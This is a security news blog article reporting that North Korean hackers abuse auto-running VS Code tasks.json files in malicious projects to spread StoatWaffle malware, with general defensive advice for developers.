North Korean Hackers Use VS Code Tasks to Spread StoatWaffle Malware

Robert Moore · 2026-03-23

Let's talk about something that's been keeping security folks up at night lately. North Korean hackers have found a new way to sneak malware onto developers' machines, and it's surprisingly simple. They're using something most coders work with every day: Visual Studio Code. You know that feeling when you're deep in a project and just want things to run smoothly? These threat actors are counting on that. They've been distributing what's called StoatWaffle malware through malicious VS Code projects. It's part of what security researchers call the Contagious Interview campaign, though you might also hear it referred to as WaterPlum. ### How the Attack Works Here's where it gets clever. Instead of relying on flashy exploits or complex vulnerabilities, they're using VS Code's built-in automation features. Specifically, they're abusing the "tasks.json" file that developers use to automate routine tasks like building projects or running tests. Think about it like this: you download what looks like a legitimate project, maybe from a forum or GitHub. You open it in VS Code, and everything seems normal. But hidden in that tasks.json file is a command that runs automatically when you open the project. Before you know it, malware is installing itself on your system. ### Why This Tactic Is So Effective This approach works because it targets developers' trust in their tools. VS Code is used by millions of programmers worldwide, from beginners to experts at major tech companies. We all assume our development environments are safe spaces to work in. - Developers rarely think to check automation files for malicious code - The attacks blend in with legitimate development workflows - Security tools might not flag tasks.json as suspicious - The malware can run with the same permissions as VS Code itself It's a classic case of hiding in plain sight. The attackers aren't breaking down doors - they're walking right through the front entrance because we've left it unlocked. ### The Timeline of These Attacks What's particularly concerning is how recent this tactic is. Security analysts first spotted these attacks starting in December 2025. That means this is a fresh approach that's still evolving. The North Korean group behind these attacks is known for being adaptable and persistent. As one security researcher put it recently: "When attackers start targeting development tools, we're in new territory. This isn't just about compromising systems - it's about compromising the very process of creating software." ### What StoatWaffle Malware Does While we're still learning about StoatWaffle's full capabilities, here's what security experts have uncovered so far: - It establishes persistence on infected systems - It can steal sensitive data and credentials - The malware communicates with command-and-control servers - It has capabilities for lateral movement within networks The real danger isn't just the initial infection. Once StoatWaffle gets a foothold, it can spread to other systems, potentially compromising entire development pipelines or corporate networks. ### Protecting Yourself and Your Team So what can you do about this? First, don't panic. Awareness is your best defense. Start by being more cautious about the projects you download and open. If something seems off about a project's structure or source, trust that instinct. Here are some practical steps you can take right now: - Review your VS Code security settings and disable automatic task running - Only download projects from trusted sources you can verify - Keep VS Code and all extensions updated to the latest versions - Use separate development environments for testing unknown projects - Implement network segmentation to limit potential damage Remember, security isn't about being paranoid - it's about being prepared. These attacks succeed because they exploit normal workflows. By understanding how they work, you can build habits that keep you safe without slowing down your development process. The landscape of cyber threats keeps changing, and developers are increasingly in the crosshairs. Tools like VS Code make us more productive, but they also create new attack surfaces. Staying informed about these tactics is the first step toward building more secure development practices. Take a moment today to check your own setup. Look at those tasks.json files with fresh eyes. Talk to your team about these threats. Because in security, the best defense is a community that watches out for each other.